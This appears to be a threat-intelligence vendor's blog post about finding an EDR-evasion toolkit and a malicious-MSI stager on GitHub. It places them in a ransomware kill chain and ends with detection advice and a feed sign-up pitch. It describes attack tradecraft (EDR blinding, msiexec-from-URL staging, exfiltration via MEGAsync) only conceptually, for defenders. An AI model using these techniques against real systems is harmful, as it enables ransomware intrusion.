This Morning Our Harvester Stopped Catching Kid-Grade Token-Grabbers and Caught an EDR-Evasion Kit and an MSI Stager on GitHub. That's the Step After the VPN.

For most of the past week our GitHub hunting cron has been pulling the same low tier of malware out of public repositories: Android remote-access trojans of the SpyNote family and Discord token-grabbers, the kid-grade stuff aimed at gamers and World Cup streamers, which I wrote about two days ago. This morning the stream changed character. At the top of today's catches are two repositories that are not aimed at teenagers: one tagged EDR-Bypass, an AV-and-EDR evasion toolkit, and one tagged MSIStager, a Windows Installer-based malware stager. Two repos is not a trend and I am not going to call it one — but the category is worth flagging the moment it appears, because this is operator-grade tradecraft, and it is the exact missing piece of the kill chain I have been documenting all week.

Here is why these two specifically matter, and it connects directly to the last three things we published. Akira and Qilin — the two highest-volume ransomware crews on earth — both get in through your edge VPN: Akira through SonicWall and Cisco SSL-VPN, Qilin through this week's Check Point IKEv1 zero-day that needs no password. Getting in is step one. But getting in does not deploy the ransomware. Between the VPN session and the encrypted network sits the endpoint detection and response agent — the EDR — whose entire job is to notice the attacker moving and kill the process before it spreads. So the step after the VPN, every single time, is defeating or blinding that EDR. An EDR-evasion toolkit published openly on GitHub is therefore not a curiosity; it is the second tool in the same bag as the VPN exploit, available to anyone who can press the clone button, and it lowers the skill floor for the part of the intrusion that used to require real operator knowledge. The MSI stager is the delivery companion: msiexec is a trusted, signed Windows binary, and staging your payload through a malicious MSI is a living-off-the-land move that sails past controls watching for unsigned executables. We have seen the msiexec-from-URL pattern before in the TeamPCP and OpenClaw skill-payload work — it keeps recurring because it works.

The shape that should land for a defender is the assembly line, not the individual part. A modern intrusion is no longer one bespoke tool written by one skilled person; it is a kit assembled from public components — an edge-VPN exploit to get in, an EDR-evasion module to go quiet, an MSI or LOLBin stager to deliver, an exfil utility like MEGAsync to steal, and a ransomware payload to finish. Every one of those parts is, increasingly, sitting in a public repository or a leaked builder, and our harvester catches them at the staging end, before they are wrapped into a campaign. That is the whole value of watching where the material stages rather than where the breach reports land: by the time an EDR-evasion kit shows up in an incident-response writeup, it has already been used. Catching it on GitHub the morning it is published is the left-of-boom signal — the same instinct that had us on the FreePBX zero-day, the Cisco FMC chain, and the Check Point VPN flaw before they were headlines.

The protective read, because a category note without a defender action is just trivia. If you run EDR, understand that evasion of it is now a commodity capability, which means EDR cannot be your only line — you need detections that survive the agent being blinded: network-side telemetry on the VPN and east-west movement, identity analytics on anomalous logons, and immutable logging the attacker cannot reach from the endpoint. For the MSI and LOLBin angle, hunt for msiexec invoking from a URL or a non-standard path, MSI installs that spawn script interpreters or network connections, and signed-binary proxy execution generally — these are detectable behaviors even when the binary itself is trusted. And the strategic point for anyone running the edge appliances in this week's posts: patch the VPN, yes, but assume the crew that gets through it is carrying exactly this kind of EDR-evasion and LOLBin staging, and build the layers that catch the steps after the front door, not just the front door.

The honest 95%: a repository named for EDR evasion or MSI staging is publicly-available offensive tooling, and a real share of that category is legitimate red-team and security research — dual-use is the default in this space, and we tag what the bait pattern catches, not a confirmed criminal campaign behind each repo. Two repos in one morning is an observation, not a declared trend; I am flagging the category shift because it is worth watching, not because two data points make a wave. And GitHub will likely remove these once reported, which is the point of indexing the pattern and the tradecraft rather than betting on the URL. What we can tell you is that the public-code malware economy is not only the kid-grade stuff anymore, that today it surfaced the precise post-entry capabilities the top ransomware crews need after they clear your VPN, and that our harvester had them at 08:15 UTC while the rest of the internet was asleep. The front door has been the story all week. This is what they bring once they are through it.

The threat feed this post is built on

1.14M+ IOCs, STIX 2.1, precursor signals, supply-chain detection. Free API key in 30 seconds.

Get your free key → analytics.dugganusa.com/stix/register